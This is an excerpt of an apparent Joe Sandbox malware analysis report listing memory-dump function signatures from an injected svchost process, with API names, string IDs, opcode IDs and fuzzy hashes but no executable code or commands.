                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 60396dbf8193c66fe5ac7b650eae64932b251783eb6f54ce96491f2ccaba219a
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 7E81E230F3C2418EFF53AB69BA4D7A92693AB85BB0F444495AB0C47796DB38C8458F00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: 718d88186cfda39211f00652ecfaa41ce054e7db4dff624115fbfe3c681f6fb3
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: 25319435E2A650A9FF17DF16BA0876973A8BB08BB4F1A05399F2E56344DF38C4458B00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: fc7e1b1ed16809a650b1f5555c3e405dc308a3f3d7aa29e9c4ed86084af95f10
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: 3731A531F2A750A9FF179B17BA0879963A4BB08BB4F190565DF2E4B380DF38C4458B00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: 91a433c217c04082ad1f486eb7d2e43d4e4ffbc584196f1197b4cce4587230f2
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: 13116D25F28B548AF7529F66F94832972A4F788FF4F044225EB5E87798DF78C9048B40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: fbeb6a94914a570171b4535a8529eb48f16e952c0f3ab0caa979db4db8e3b743
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: 13118221F38B408AF7529B56F958B1972A0F788FF4F444214EB5E87798DF78C5448B40
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction ID: e8391bee6fdca3771a212f1945ba1f677d37caf8d90922ff2d72564ef45cdded
                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction Fuzzy Hash: 78D19A76A19B8885FB71DB1AF59835A77A0F388B94F110226EB8D47BA5DF38C541CF00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction ID: d0615ec75562ae8b846c8d4e1fde94dd17ac7934c75cf63c89c1539d01bece7e
                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction Fuzzy Hash: 7FD1AC76A18B8885EB71DB19F59835A77A0F788B94F100256EB8D47BA5DF3CC541CF00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: 30d6d1bd8e585801d4b293a0d22b336a39d1fbdc57cead586b7ad879c4b752a2
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: F831C425F29B518AFB56EF16BA0826973A0FB44BA4F0540319F8807B54EF38C4A2CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: 689b0c438920bc9e0b22b1dcd681b4d0ed3b2f815af045fb0ee258a69ef0ff31
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: C231A421F29B518AFF16EF16BA4866963A0FB44BA4F1440209F8D07B54EF38C4A2CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: 1cf9e5601c1a2223c9aba708858afbed64e4bf9acef4a7ead26ad9c77fb39c54
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: CD015B25F18A519AFB11DF22B55836963A5FB88FE0F494036CF8A43754DF38C986CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: 468b229a2f301c5d10b7d8201a507bc93130f30ace5a1e115a40ebc5244552a4
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: 6B010921B28A419AFB169B22B55C75963A1EB88BE0F484435DF8D43754DF38C9868B50
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: c090c4c600650664428e35675aa4731b13ce8687df9ecb69ac4ecbd689cb1256
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: 3D111B69E297508AFB669F26F91D76677A4BB58BA1F040425CB4A07754EF3CC5088B00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: 01c47a8f307f985bf1e1e1ff130d6ae6c5db7dd17f14c55a5dc92c9d32bcdb66
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: F8112D65E297408AFB269B22F50DB56A7A0BB58BA1F140424CF4D47754EF3CC508CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction ID: d8a26aca7ebe5916b8cc5bcc4ea623442fa863d2c253893c5d4a152907abe331
                                                • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction Fuzzy Hash: A7518A32E396148EFF16CF25FA48B5937A5F384BA8F5281319B1667B88DB35D841CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: 1a9b4640c8bd685ba5acba3f7914d658d0756375bdd99c72aaafd630b5bddc43
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: 67F04466F286419AF7219F25F6D83696760F744BA8F848031CB8946564DF3CC649CF00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: 7c5799b6964da1f769c7346a1c76950868bf83e89bc4ed125558aebb7ec5592e
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: 24F04462F28A419AFB219B65F69D7596760F744BA8F848020CB8D47654DF2CC649CF00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction ID: ed7855a1d7046310c6a40dd818b511b216d5fcfaf8746681799ed5727b917dbd
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: C2F05424E38B9495FB054F23FA081256210AB48FE0F0481319F9A07B18CF2CC4418B00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction ID: 1a9c4932eb089b9cb16f5c0184a1d0996641b1ac61fa683d40d32a5bc1bd8aa9
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: 8AF08910F38BC095FB018B13FA095156210AB48FE0F044131DF5E07B18CF2CC4418B00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction ID: 666fc787f931b81fa28dd704c99aba7e185165ee822e3270d5f9a33dcbd7b141
                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction Fuzzy Hash: B4F0FE65F39A44A9FF564F70F9983752360AF88BA1F45242B970B45564DF28C48DCF10
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction ID: 774d3bd8ab978b60ff7c21d43fde67f78ae7ebb68182027b1592d11b6eaf7419
                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction Fuzzy Hash: 7D02A736A2DB848AF7618B59F59835AB7A0F3C5794F114125EB8E87BA8DB7CC444CF00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction ID: f5861fed7ba68e98a19f758ea0f0d1f0b51c1fbd40954379cf201d0898089b54
                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction Fuzzy Hash: 3902C732A2DB848AEBA1CB55F59475AB7A0F3D5794F100155EB8E87BA8DB7CC484CF00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: 45b2544abe56a39e35ea1af0a4d020bf8543d7c65c773ca83a774ec6b438f30f
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: 70810F2AE39A50ACFB529F76FA483BD37A1F755BA4F440512DF0AA3692DB34C441CB10
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: 26c1d3d3d4dfc92538e6179a9cbce9eca40d1afe7bcacec6557c3016137259c5
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: A681F422E39A40ADFB529F60FA48BAD27A1F74ABB4F440115EF4E63795DB35C441CB10
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction ID: 3e6612b992f913f82c9005df87f2ee28d020918f47da2f0ac2c00043a5507f7f
                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction Fuzzy Hash: BB619936E2DA84CAF7619B15F59832AB7A4F388764F110125EB8E47BA8DB7CC544CF00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction ID: 46b0fc104808f5061891ba78237e60911c68285d664d32210f14aabd36b9600e
                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction Fuzzy Hash: 5D619636E2DA84CAFB629B15F55871AB7A0F398764F100156FB8D87BA8DB78C544CF00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2635445548.0000029B91DD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B91DD0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b91dd0000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 7a1efd6f9115c96823cbc084938d2b144330736117e1befdad690c6f3d907a7a
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 3211A562B74E110DF7A79169F75E3BE1C817F54376F484628EB7706BDB8B188C42AA00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 876b0d880c9396d1add801eaf825b7ba892b47160a12a33a21b62ffc502531ed
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: ED11822EE7CB0189F7AA1D79F75E37950416BA5374F084724BBF6063DA8B988D42DA00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 08d54268585fdbafa7090e1ccdde363598429efbd96a497b4c4cdedb1ba71f08
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: C9118222E7CB0149F7AA1169F75EB6950816B75374F094724BBFF073DA8B988C425A00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: 4a886e9207fa364f303bad0a34f3deb9fb3ad3f0b96814e59e093575315c6af9
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: FA112E29F18B5086FB559B61F518369B674FB48BA4F05003ADF8907754EF3DC509CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: defc2d454db1e8e869f151a17ebd0dfd86ca97b4be6e45acda3a84b5a85f46d2
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: F4112E25F18B4086FF569B21F50875966B0FB44BA4F140425DF8D07754EF3DC509CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2635445548.0000029B91DD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B91DD0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b91dd0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 9f062ba64f5f3bb31c96c4e16098646ee305cc945691ba3f121e517d682d653e
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: 1051903A7226008EFB27DF15FA48B193795FB44BA8F518124DB4647B88DB34DA41EB24
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2635445548.0000029B91DD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B91DD0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b91dd0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: 44643fc7fae871e2db009b70b97542c06cd2de5e433ad7934ee4b76108beecef
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: F2318D7A2217409AF727DF11FA48B193BA4FB40BD8F558014EF5A07B88CB38DA41DB14
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free
                                                • String ID:
                                                • API String ID: 3168794593-0
                                                • Opcode ID: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
                                                • Instruction ID: f4a707cb475bc8e6ef8e5e626179c24ee6e57d3c3beed6b0476d6a4a34df6572
                                                • Opcode Fuzzy Hash: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
                                                • Instruction Fuzzy Hash: A3111F31E28F849AFB56AF66B54865AB770F789B94F044015DB8E03B54DF3CC1528B40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
